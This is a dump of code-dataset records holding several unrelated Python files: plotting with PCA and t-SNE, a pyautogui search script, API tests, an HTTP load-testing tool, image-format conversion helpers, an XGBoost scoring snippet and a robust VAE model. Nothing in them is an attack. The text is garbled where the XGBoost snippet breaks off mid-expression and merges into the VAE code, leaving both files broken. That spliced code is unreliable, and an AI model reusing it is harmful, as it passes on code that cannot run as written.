"sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator", "line_number": 89, "usage_type": "name"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator.isNormalizeUnique", "line_number": 90, "usage_type": "call"}, {"api_name": "sectionproject.urlutils.urlcomparator.urlcomparator.UrlComparator", "line_number": 90, "usage_type": "name"}]}
+{"seq_id": "447564364", "text": "import cPickle as pickle\nfrom itertools import compress\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom mpl_toolkits.axes_grid1 import ImageGrid\nfrom sklearn.decomposition import PCA \nfrom sklearn.manifold import TSNE\n\n\ndef pca(states, labels, n_components, plot_by_colors=False):\n assert n_components == 2 or n_components == 3, 'Wrong number of components'\n\n print('PCA')\n pca = PCA(n_components=n_components)\n\n print('Fitting & transforming')\n transformed_states = pca.fit_transform(states)\n\n print('Visual')\n plt.clf()\n plt.cla()\n color_names = ['blue', 'red', 'black', 'green', 'pink', 'yellow', 'brown', 'magenta', 'cyan', 'orange']\n colors = np.choose(labels, color_names)\n if n_components == 2:\n\n if plot_by_colors:\n fig = plt.figure(1, (4., 4.))\n grid = ImageGrid(fig, 111, # similar to subplot(111)\n nrows_ncols=(3, 4), # creates 2x2 grid of axes\n axes_pad=0.1, # pad between axes in inch.\n )\n\n for i in range(10):\n\n labels_one = np.array(labels)\n idxs = labels_one == i\n states_one = np.array(list(compress(transformed_states, idxs)))\n labels_one = [color_names[i] for _ in range(len(states_one))]\n grid[i].scatter(states_one[:, 0], states_one[:, 1], c=labels_one)\n\n # plt.scatter(transformed_states[:, 0], transformed_states[:, 1], c=colors)\n elif n_components == 3:\n fig = plt.figure(1, figsize=(4, 3))\n ax = Axes3D(fig, rect=[0, 0, .95, 1], elev=48, azim=134)\n ax.scatter(transformed_states[:, 0], transformed_states[:, 1], transformed_states[:, 2], c=colors)\n\n plt.show()\n\n\ndef tsne(states, labels, n_components):\n assert n_components == 2 or n_components == 3, 'Wrong number of components'\n\n print('T-SNE')\n tsne = TSNE(n_components=n_components)\n\n print('Fitting & transforming')\n transformed_states = tsne.fit_transform(states)\n\n print('Visual')\n plt.clf()\n plt.cla()\n colors = np.choose(labels, ['blue', 'red', 'black', 'green', 'pink', 'yellow', 'brown', 'magenta', 'cyan', 'orange'])\n if n_components == 2:\n plt.scatter(transformed_states[:, 0], transformed_states[:, 1], c=colors)\n elif n_components == 3:\n fig = plt.figure(1, figsize=(4, 3))\n ax = Axes3D(fig, rect=[0, 0, .95, 1], elev=48, azim=134)\n ax.scatter(transformed_states[:, 0], transformed_states[:, 1], transformed_states[:, 2], c=colors)\n\n plt.show()\n\n\nif __name__ == '__main__':\n print('Loading')\n df = pickle.load(open('/home/petrbel/Dropbox/ALI/states.pkl', 'rb'))\n pca(states=list(df['states']), labels=list(df['labels']), n_components=2, plot_by_colors=True)\n # pca(states=list(df['states']), labels=list(df['labels']), n_components=3)\n # tsne(states=list(df['states']), labels=list(df['labels']), n_components=2)\n # tsne(states=list(df['states']), labels=list(df['labels']), n_components=3)\n print('Finished')\n", "sub_path": "visual.py", "file_name": "visual.py", "file_ext": "py", "file_size_in_byte": 3103, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "sklearn.decomposition.PCA", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cla", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}, {"api_name": "numpy.choose", "line_number": 25, "usage_type": "call"}, {"api_name": 
"matplotlib.pyplot.figure", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}, {"api_name": "mpl_toolkits.axes_grid1.ImageGrid", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 39, "usage_type": "call"}, {"api_name": "itertools.compress", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "mpl_toolkits.mplot3d.Axes3D", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "sklearn.manifold.TSNE", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 62, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cla", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 63, "usage_type": "name"}, {"api_name": "numpy.choose", "line_number": 64, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 66, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}, {"api_name": "mpl_toolkits.mplot3d.Axes3D", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 72, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 72, "usage_type": "name"}, {"api_name": "cPickle.load", "line_number": 77, "usage_type": "call"}]}
+{"seq_id": "61919113", "text": "import pyautogui\r\nimport time\r\nfrom selenium import webdriver\r\n\r\n#定义图像识别双击事件\r\ndef mouseDoubleClick(image):\r\n x,y=pyautogui.locateCenterOnScreen(image,confidence=0.9)\r\n pyautogui.click(x,y,clicks=2,interval=0.2,duration=0.2,button='left')\r\n\r\n#定义单击事件\r\ndef mouseClick(image):\r\n x,y=pyautogui.locateCenterOnScreen(image,confidence=0.9)\r\n pyautogui.click(x,y,clicks=1,interval=0.2,duration=0.2,button='left')\r\n\r\nmouseDoubleClick(image = 'chorm.png')\r\n\r\npyautogui.write(\"www.baidu.com\")\r\ntime.sleep(1)\r\npyautogui.press(\"enter\")\r\ntime.sleep(3)\r\n\r\npyautogui.write(\"Detroit: Become Human\")\r\ntime.sleep(2)\r\npyautogui.press(\"enter\")\r\n", "sub_path": "students/Siyang Liu/pyaotugui/pyautogui_serch.py", "file_name": "pyautogui_serch.py", "file_ext": "py", "file_size_in_byte": 667, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pyautogui.locateCenterOnScreen", "line_number": 7, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 8, "usage_type": "call"}, {"api_name": "pyautogui.locateCenterOnScreen", "line_number": 12, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 13, "usage_type": "call"}, {"api_name": "pyautogui.write", "line_number": 17, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 18, "usage_type": "call"}, {"api_name": "pyautogui.press", "line_number": 19, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 20, "usage_type": "call"}, {"api_name": "pyautogui.write", "line_number": 22, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 23, "usage_type": "call"}, {"api_name": "pyautogui.press", "line_number": 24, "usage_type": "call"}]}
+{"seq_id": "115663981", "text": "from tastypie.test import ResourceTestCase\nfrom projects.tests.factories import ProjectFactory\nfrom tools.mongo import MongoFlushMixin\nfrom .. import models\n\n\nclass BaseTaskResourceCase(MongoFlushMixin, ResourceTestCase):\n \"\"\"Base task resource case\"\"\"\n mongo_flush = ['tasks']\n\n def setUp(self):\n MongoFlushMixin.setUp(self)\n ResourceTestCase.setUp(self)\n\n ProjectFactory(name='test', is_enabled=True)\n\n\nclass RawTaskResourceCase(BaseTaskResourceCase):\n \"\"\"Create task case\"\"\"\n\n def setUp(self):\n super(RawTaskResourceCase, self).setUp()\n self.url = '/api/v1/tasks/raw/'\n\n def test_create_on_post(self):\n \"\"\"Test create on post\"\"\"\n self.api_client.post(self.url, data={\n 'service': {\n 'name': 'dummy',\n },\n 'project': 'test',\n 'commit': {\n 'branch': 'develop',\n 'commit': 'asdfg',\n 'author': 'nvbn',\n },\n 'violations': [\n {'name': 'dummy', 'raw': '1'},\n ]\n })\n self.assertEqual(1, models.Tasks.count())\n\n def test_error_on_wrong_service(self):\n \"\"\"Test error on wrong service\"\"\"\n response = self.api_client.post(self.url, data={\n 'service': {\n 'name': 'dummy!!!',\n },\n 'project': 'test',\n 'commit': {\n 'branch': 'develop',\n 'commit': 'asdfg',\n 'author': 'nvbn',\n },\n 'violations': [\n {'name': 'dummy', 'raw': '1'},\n ]\n })\n self.assertEqual(response.status_code, 404)\n\n def test_error_on_wrong_project(self):\n \"\"\"Test error on wrong project\"\"\"\n response = self.api_client.post(self.url, data={\n 'service': {\n 'name': 'dummy',\n },\n 'project': 'test!!',\n 'commit': {\n 'branch': 'develop',\n 'commit': 'asdfg',\n 'author': 'nvbn',\n },\n 'violations': [\n {'name': 'dummy', 'raw': '1'},\n ]\n })\n self.assertEqual(response.status_code, 404)\n\n\nclass TaskResourceCase(BaseTaskResourceCase):\n \"\"\"Get tasks resource case\"\"\"\n\n def setUp(self):\n super(TaskResourceCase, self).setUp()\n self.url = '/api/v1/tasks/task/'\n\n def _create_tasks(self, project='test', count=20):\n \"\"\"Create tasks\"\"\"\n models.Tasks.insert([{\n 'service': {\n 'name': 'dummy',\n },\n 'project': project,\n 'commit': {\n 'branch': 'develop',\n 'commit': 'asdfg',\n 'author': 'nvbn',\n },\n 'violations': [{\n 'name': 'dummy',\n 'raw': '1',\n 'status': 1,\n 'prepared': '123{}'.format(n),\n }]\n } for n in range(count)])\n\n def test_get_all(self):\n \"\"\"Test get all\"\"\"\n self._create_tasks()\n response = self.api_client.get(self.url)\n data = self.deserialize(response)\n self.assertEqual(data['meta']['total_count'], 20)\n self.assertIsNone(data['objects'][0]['violations'])\n\n def test_get_all_with_violations(self):\n \"\"\"Test get all with violations\"\"\"\n self._create_tasks()\n response = self.api_client.get('{}?with_violations=1'.format(self.url))\n data = self.deserialize(response)\n self.assert_(data['objects'][0]['violations'][0]['name'])\n self.assert_(data['objects'][0]['violations'][0]['status'])\n\n def test_get_with_full_violations(self):\n \"\"\"Test get with full violations\"\"\"\n self._create_tasks()\n response = self.api_client.get(\n '{}?with_full_violations=1'.format(self.url),\n )\n data = self.deserialize(response)\n self.assert_(data['objects'][0]['violations'][0]['raw'])\n self.assert_(data['objects'][0]['violations'][0]['prepared'])\n\n def test_filter_by_project(self):\n \"\"\"Test filter by project\"\"\"\n self._create_tasks('test', 5)\n self._create_tasks('nope', 10)\n response = self.api_client.get('{}?project=test'.format(self.url))\n data = self.deserialize(response)\n 
self.assertEqual(data['meta']['total_count'], 5)\n", "sub_path": "tasks/tests/test_resources.py", "file_name": "test_resources.py", "file_ext": "py", "file_size_in_byte": 4398, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "tools.mongo.MongoFlushMixin", "line_number": 7, "usage_type": "name"}, {"api_name": "tastypie.test.ResourceTestCase", "line_number": 7, "usage_type": "name"}, {"api_name": "tools.mongo.MongoFlushMixin.setUp", "line_number": 12, "usage_type": "call"}, {"api_name": "tools.mongo.MongoFlushMixin", "line_number": 12, "usage_type": "name"}, {"api_name": "tastypie.test.ResourceTestCase.setUp", "line_number": 13, "usage_type": "call"}, {"api_name": "tastypie.test.ResourceTestCase", "line_number": 13, "usage_type": "name"}, {"api_name": "projects.tests.factories.ProjectFactory", "line_number": 15, "usage_type": "call"}]}
+{"seq_id": "278185694", "text": "#!/usr/bin/env python3.5\n\n\nimport aiohttp\nimport argparse\nimport asyncio\nimport functools\nimport requests\nimport multiprocessing as mp\nimport time\n\nimport config\nfrom logger import *\n\n\nclass ReusedSession:\n \"\"\" Session for connect to a server. Reuse after return a response (for keep-alive)\n Parameters:\n session (aiohttp.ClientSession): session for connect\n working (bool): flag shows the session does not have work for server \n \"\"\"\n def __init__(self):\n self.session = aiohttp.ClientSession()\n self.working = False\n self.failed = False\n\n\ndef get_free_session(sessions, loggers):\n \"\"\" Find not working session for assign new work. Create new one if no available sessions\n Args:\n sessions (list)\n sessions.item (ReusedSession)\n Returns:\n ReusedSession\n \"\"\"\n LOG, LOG_ERR = loggers\n\n failed_session_num = []\n free_session = None\n for i, s in enumerate(sessions):\n if s.failed:\n failed_session_num.append(i)\n continue\n\n if not s.working:\n free_session = s\n break\n\n # Reverse sort for correct delete in array - index out of range\n failed_session_num = sorted(failed_session_num, reverse=True)\n for i in failed_session_num:\n #LOG.put( LogMsg(LN.err.FAIL_SESSION, time.time()) )\n sessions[i].session.close()\n del sessions[i]\n\n if free_session is not None:\n return free_session\n\n s = ReusedSession()\n sessions.append(s)\n #LOG.put( LogMsg(LN.info.NEW_SESSION, time.time()) )\n\n return s\n\n\ndef free_session(session, *args):\n \"\"\" Returns for session opportunity reused\n Args:\n session (ReusedSession)\n Returns:\n void\n \"\"\"\n session.working = False\n\n\nasync def request(host, port, path, session, loggers):\n \"\"\" Requests server and wait response \n Args:\n session (ReusedSession)\n Returns:\n void\n \"\"\"\n LOG, LOG_ERR = loggers\n\n request_url = \"http://\" + host + \":\" + port + path\n\n try:\n async with aiohttp.client._RequestContextManager(session.session._request(aiohttp.hdrs.METH_GET, request_url)) as resp:\n #LOG.put( LogMsg(LN.info.REQUEST, time.time()) )\n await resp.text()\n asyncio.sleep(1)\n except Exception as err:\n #LOG_ERR.put( LogMsg(LN.err.REQUEST, time.time()) )\n session.failed = True\n asyncio.sleep(1)\n\n\ndef calc_rate(time_since_start, limit_rate):\n \"\"\" Suppose we need reach `limit_rate` in some time\n Args:\n time_since_start (int): num of seconds since start\n limit_rate (int): max rate for perfomance test\n Returns:\n curr_rate (int): rate for current time\n \"\"\"\n init_rate = config.INIT_RATE\n step_rate = config.STEP_RATE\n\n rate = init_rate + time_since_start * step_rate\n\n return [round(rate), limit_rate][rate > limit_rate]\n\n\nasync def schedule_send_requests(loop, host, port, path, rate, loggers):\n \"\"\" Schedule envoke send_requests with calculated rate every second\n Args:\n loop (asyncio.BaseEventLoop)\n host (str)\n port (str)\n rate (int)\n Returns:\n void\n \"\"\"\n reused_sessions = []\n it_num = -1\n \n while True:\n it_num += 1\n\n curr_rate = calc_rate(it_num, rate)\n task = loop.create_task( send_requests(loop=loop, host=host, port=port, path=path, rate=curr_rate, sessions=reused_sessions, loggers=loggers) )\n await asyncio.sleep(1)\n\n\nasync def send_requests(loop, host, port, path, rate, sessions, loggers):\n \"\"\" Sent requests for server 'host:port' with specified rate (rps)\n Args:\n loop (asyncio.BaseEventLoop)\n host (str)\n port (str)\n rate (int)\n Returns:\n void\n \"\"\"\n for i in range(rate):\n session = 
get_free_session(sessions, loggers)\n session.working = True\n task = loop.create_task( request(host, port, path, session, loggers) )\n task.add_done_callback( functools.partial(free_session, session) )\n\n\ndef load(host, port, path, rate, loggers):\n loop = asyncio.get_event_loop()\n loop.run_until_complete(\n schedule_send_requests(loop=loop, host=host, port=port, path=path, rate=rate, loggers=loggers))\n loop.close()\n\n\ndef parse_cmd():\n # For loading a simple nginx with a 1 sec sleep, the max for localhost is 6 processes x 40 rate;\n # beyond that we can't guarantee the rate level is maintained (CPU limit)\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--rate\", type=int, required=True)\n parser.add_argument(\"--host\", type=str, required=True)\n parser.add_argument(\"--port\", type=str, required=True)\n parser.add_argument(\"--path\", type=str, required=True)\n\n return parser.parse_args()\n\n\nif __name__ == \"__main__\":\n args = parse_cmd()\n load(args.host, args.port, args.path, args.rate, (None, None))\n", "sub_path": "loader/src/loader.py", "file_name": "loader.py", "file_ext": "py", "file_size_in_byte": 4883, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "aiohttp.ClientSession", "line_number": 23, "usage_type": "call"}, {"api_name": "aiohttp.client._RequestContextManager", "line_number": 88, "usage_type": "call"}, {"api_name": "aiohttp.client", "line_number": 88, "usage_type": "attribute"}, {"api_name": "aiohttp.hdrs", "line_number": 88, "usage_type": "attribute"}, {"api_name": "asyncio.sleep", "line_number": 91, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 95, "usage_type": "call"}, {"api_name": "config.INIT_RATE", "line_number": 106, "usage_type": "attribute"}, {"api_name": "config.STEP_RATE", "line_number": 107, "usage_type": "attribute"}, {"api_name": "asyncio.sleep", "line_number": 132, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 149, "usage_type": "call"}, {"api_name": "asyncio.get_event_loop", "line_number": 153, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 162, "usage_type": "call"}]}
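The ramp in calc_rate above is linear, rate(t) = INIT_RATE + t * STEP_RATE, capped at limit_rate. A self-contained check; the INIT_RATE/STEP_RATE values are assumptions, since the record reads them from config:

INIT_RATE, STEP_RATE = 5, 2  # assumed values; the record takes these from config

def calc_rate(time_since_start, limit_rate):
    rate = INIT_RATE + time_since_start * STEP_RATE
    return min(round(rate), limit_rate)

# The rate climbs by STEP_RATE each second and saturates at the limit.
assert [calc_rate(t, 20) for t in range(10)] == [5, 7, 9, 11, 13, 15, 17, 19, 20, 20]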
+{"seq_id": "213947405", "text": "#!/usr/bin/env python\n# encoding=utf8\n#########################################################################\n# Author:\n# Created Time: Thu 08 Nov 2018 08:48:39 PM CST\n# File Name: convert.py\n# Description: tensor pil cv numpy\n#########################################################################\n\nimport cv2\nimport numpy as np\nimport PIL\nimport torch\nfrom torchvision import transforms\n\n# tensor [C, H, W] 取值范围是[0, 1.0] 一般经过normalization\n# pil [H,W,C] 取值范围是[0,255] RGB\n# cv [H,W,C] 取值范围是[0,255] GBR\n\n# pil to numpy\n# np_obj = np.array( pil_obj )\n\n# numpy to pil i\n# pil_obj = PIL.Image.fromarray( np_obj ).convert('RGB')\n\n# tensor => numpy\n# np_obj = tensor.numpy()\n\n# numpy => tensor\n# tensor = torch.Tensor(np_obj)\n\n# pil to cv\n# cv_obj = np.array(pil_img)[:, :, ::-1].copy()\n\n# cv to pil\n# pil_obj = PIL.Image.fromarray(cv_obj.astype('uint8')[:, :, ::-1], mode='RGB')\n\n# tensor to pil\n# pil_img = transforms.ToPILImage()(tensor_obj).convert(\"RGB\")\n# = transpose + *255\n\ndef tensor_to_pil(tensor_img, MEAN=[], STD=[]):\n if MEAN and STD:\n np_img = tensor_img.numpy()\n for i in range(0, 3):\n np_img[i] = np_img[i] * STD[i] + MEAN[i] # unnormalize\n pil_img = transforms.ToPILImage()(torch.from_numpy(np_img)).convert(\"RGB\")\n else:\n pil_img = transforms.ToPILImage()(tensor_img).convert(\"RGB\")\n return pil_img\n\ndef tensor_to_cv(tensor_img, MEAN=[], STD=[]):\n pil_img = tensor_to_pil(tensor_img, MEAN, STD)\n cv_img = np.array(pil_img)[:, :, ::-1].copy()\n return cv_img\n\n\nif __name__ == '__main__':\n\n MEAN = [0.485, 0.456, 0.406]\n STD = [0.229, 0.224, 0.225]\n img_transform = transforms.Compose([transforms.Resize((224, 224)), transforms.ToTensor(), transforms.Normalize(MEAN, STD)])\n pil_img = PIL.Image.open(\"color.jpg\").convert(\"RGB\")\n\n # pil to tensor\n tensor_img = img_transform(pil_img)\n\n pil_img = tensor_to_pil(tensor_img, MEAN, STD)\n pil_img.save(\"pil.jpg\")\n cv_img = np.array(pil_img)[:, :, ::-1].copy()\n cv2.imwrite(\"cv.jpg\", cv_img)\n", "sub_path": "mmcv/image/convert.py", "file_name": "convert.py", "file_ext": "py", "file_size_in_byte": 2079, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "torchvision.transforms.ToPILImage", "line_number": 47, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 47, "usage_type": "name"}, {"api_name": "torch.from_numpy", "line_number": 47, "usage_type": "call"}, {"api_name": "torchvision.transforms.ToPILImage", "line_number": 49, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 49, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 54, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 62, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 62, "usage_type": "name"}, {"api_name": "torchvision.transforms.Resize", "line_number": 62, "usage_type": "call"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 62, "usage_type": "call"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 62, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 63, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 63, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 70, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 71, "usage_type": "call"}]}
+{"seq_id": "648911782", "text": "from xgboost.sklearn import XGBClassifier as XGBoost\nimport numpy as np\nfrom sklearn.linear_model.logistic import LogisticRegression as LR\nfrom sklearn.metrics import accuracy_score,confusion_matrix,roc_auc_score,matthews_corrcoef\nfrom sklearn.model_selection import StratifiedKFold\ndef scores(y_test,y_pred,th=0.5):\n y_predlabel=[(0 if item max_norm).float() # ).squeeze()\n result_new = result / norm * norm_mask + result * (1 - norm_mask)\n #result[:,norm_mask,:] = result[:,norm_mask,:].div(norm[:,norm_mask,:])\n else:\n result_new = result\n\n # self.last_weight = weight.clone() # NOTE: waste of memory?\n\n return result_new\n\n def to_one_hot(self, input):\n # Returns a new tensor that doesn't share memory\n result = torch.index_select(\n self.ones, 0, input.view(-1).long()).view(\n input.size()+(self.depth,))\n result.requires_grad = self.requires_grad\n return result\n\n def __repr__(self):\n return self.__class__.__name__ + \"({})\".format(self.depth)\n\n \nclass VAE(nn.Module):\n def __init__(self):\n\n super(VAE, self).__init__()\n\n feats = 3\n embedding_size = 50\n layer_size = 400\n latent_size = 5\n\n self.feat_info = [[\"time\",'categ',745],['pulocation','categ',266],['dozone','categ',7],['cnt','real',1]]\n self.size_input = feats*50+1\n self.size_output = feats + 1\n self.alpha = 0.95\n self.gauss = 2\n ## Encoder Params\n\n # define a different embedding matrix for each feature\n self.feat_embedd = nn.ModuleList([nn.Embedding(c_size, embedding_size, max_norm=1)\n for _, col_type, c_size in self.feat_info\n if col_type==\"categ\"])\n\n self.fc1 = nn.Linear(self.size_input, layer_size)\n self.fc21 = nn.Linear(layer_size, latent_size)\n self.fc22 = nn.Linear(layer_size, latent_size)\n\n ## Decoder Params\n\n self.fc3 = nn.Linear(latent_size,layer_size)\n\n self.out_cat_linears = nn.ModuleList([nn.Linear(layer_size, c_size) if col_type==\"categ\"\n else nn.Linear(layer_size, c_size)\n for _, col_type, c_size in self.feat_info])\n\n self.logvar_x = nn.Parameter(torch.zeros(1,1).float())\n\n ## Other\n\n self.activ = nn.ReLU()\n\n self.logSoftmax = nn.LogSoftmax(dim=1)\n self.sigmoid = nn.Sigmoid()\n\n # define encoder / decoder easy access parameter list\n encoder_list = [self.fc1, self.fc21, self.fc22]\n self.encoder_mod = nn.ModuleList(encoder_list)\n if self.feat_embedd:\n self.encoder_mod.append(self.feat_embedd)\n\n self.encoder_param_list = nn.ParameterList(self.encoder_mod.parameters())\n\n decoder_list = [self.fc3, self.out_cat_linears]\n self.decoder_mod = nn.ModuleList(decoder_list)\n self.decoder_param_list = nn.ParameterList(self.decoder_mod.parameters())\n if len(self.logvar_x):\n self.decoder_param_list.append(self.logvar_x)\n\n\n def get_inputs(self, x_data):\n input_list = []\n cursor_embed = 0\n start = 0\n \n for feat_idx, ( _, col_type, feat_size ) in enumerate(self.feat_info):\n if col_type == \"categ\":\n aux_categ = self.feat_embedd[cursor_embed](x_data[:,feat_idx].long())#*drop_mask[:,feat_idx].view(-1,1)\n input_list.append(aux_categ)\n cursor_embed += 1\n \n elif col_type == \"real\": \n input_list.append((x_data[:,feat_idx]).view(-1,1).float())#*drop_mask[:,feat_idx]\n \n return torch.cat(input_list, 1)\n\n def encode(self, x_data):\n q_params = dict()\n input_values = self.get_inputs(x_data)\n fc1_out = self.fc1(input_values)\n h1_qz = self.activ(fc1_out)\n q_params['z'] = {'mu': self.fc21(h1_qz), 'logvar': self.fc22(h1_qz)}\n return q_params\n\n def sample_normal(self, q_params_z):\n if self.training:\n eps = 
torch.randn_like(q_params_z['mu'])\n std = q_params_z['logvar'].mul(0.5).exp_()\n return eps.mul(std).add_(q_params_z['mu'])\n else:\n return q_params_z['mu']\n\n def reparameterize(self, q_params):\n q_samples = dict()\n q_samples['z'] = self.sample_normal(q_params['z'])\n return q_samples\n\n def decode(self, z):\n p_params = dict()\n h3 = self.activ(self.fc3(z))\n out_cat_list = []\n\n for feat_idx, out_cat_layer in enumerate(self.out_cat_linears):\n if self.feat_info[feat_idx][1] == \"categ\": # coltype check\n out_cat_list.append(self.logSoftmax(out_cat_layer(h3)))\n elif self.feat_info[feat_idx][1] == \"real\":\n out_cat_list.append(out_cat_layer(h3))\n\n # tensor with dims (batch_size, self.size_output)\n p_params['x'] = torch.cat(out_cat_list, 1)\n p_params['logvar_x'] = self.logvar_x.clamp(-3,3)\n return p_params\n\n def forward(self, x_data, n_epoch=None):\n q_params = self.encode(x_data)\n q_samples = self.reparameterize(q_params)\n return self.decode(q_samples['z']), q_params, q_samples\n\n def loss_function(self, input_data, p_params, q_params, q_samples, clean_comp_only=False, data_eval_clean=False):\n\n \"\"\" ELBO: reconstruction loss for each variable + KL div losses summed over elements of a batch \"\"\"\n\n dtype_float = torch.cuda.FloatTensor\n nll_val = torch.zeros(1).type(dtype_float)\n # mixed datasets, or just categorical / continuous with medium number of features\n start = 0\n cursor_num_feat = 0\n\n for feat_select, (_, col_type, feat_size) in enumerate(self.feat_info):\n pi_feat = torch.sigmoid(q_params['w']['logit_pi'][:,feat_select]).clamp(1e-6, 1-1e-6)\n \n if clean_comp_only and data_eval_clean:\n pi_feat = torch.ones_like(q_params['w']['logit_pi'][:,feat_select])\n \n # compute NLL\n if col_type == 'categ':\n nll_val += nll_categ_global(p_params['x'][:,start:(start + feat_size)],\n input_data[:,feat_select].long(), feat_size, isRobust=True,\n w=pi_feat, isClean=clean_comp_only).sum()\n start += feat_size\n elif col_type == 'real':\n nll_val += nll_gauss_global(p_params['x'][:,start:(start + 1)], # 2\n input_data[:,feat_select],\n p_params['logvar_x'][:,cursor_num_feat], isRobust=True,\n w=pi_feat, isClean=clean_comp_only, \n std_0_scale=self.gauss).sum()\n start += 1 # 2\n cursor_num_feat +=1\n\n\n # kld regularizer on the latent space\n z_kld = -0.5 * torch.sum(1 + q_params['z']['logvar'] - q_params['z']['mu'].pow(2) - q_params['z']['logvar'].exp())\n\n # prior on clean cells (higher values means more likely to be clean)\n prior_sig = torch.tensor(self.alpha).type(dtype_float)\n\n # kld regularized on the weights\n pi_mtx = torch.sigmoid(q_params['w']['logit_pi']).clamp(1e-6, 1-1e-6)\n w_kld = torch.sum(pi_mtx * torch.log(pi_mtx / prior_sig) + (1-pi_mtx) * torch.log((1-pi_mtx) / (1-prior_sig)))\n\n loss_ret = nll_val + z_kld if clean_comp_only else nll_val + z_kld + w_kld\n\n return loss_ret, nll_val, z_kld, w_kld \n\n\n\n \n", "sub_path": "archived/RVAE_org_minimal/RVAE.py", "file_name": "RVAE.py", "file_ext": "py", "file_size_in_byte": 12049, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "torch.nn.functional.nll_loss", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 14, "usage_type": "name"}, {"api_name": "torch.nn.functional.nll_loss", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 19, "usage_type": "name"}, {"api_name": "torch.log", "line_number": 21, "usage_type": "call"}, {"api_name": 
"torch.tensor", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.ones", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.nn.functional.nll_loss", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 26, "usage_type": "name"}, {"api_name": "torch.tensor", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.log", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 54, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 54, "usage_type": "name"}, {"api_name": "torch.eye", "line_number": 67, "usage_type": "call"}, {"api_name": "torch.set_grad_enabled", "line_number": 113, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 114, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 115, "usage_type": "call"}, {"api_name": "torch.index_select", "line_number": 133, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 143, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 143, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 161, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 161, "usage_type": "name"}, {"api_name": "torch.nn.Embedding", "line_number": 161, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 165, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 165, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 166, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 166, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 167, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 167, "usage_type": "name"}, {"api_name": 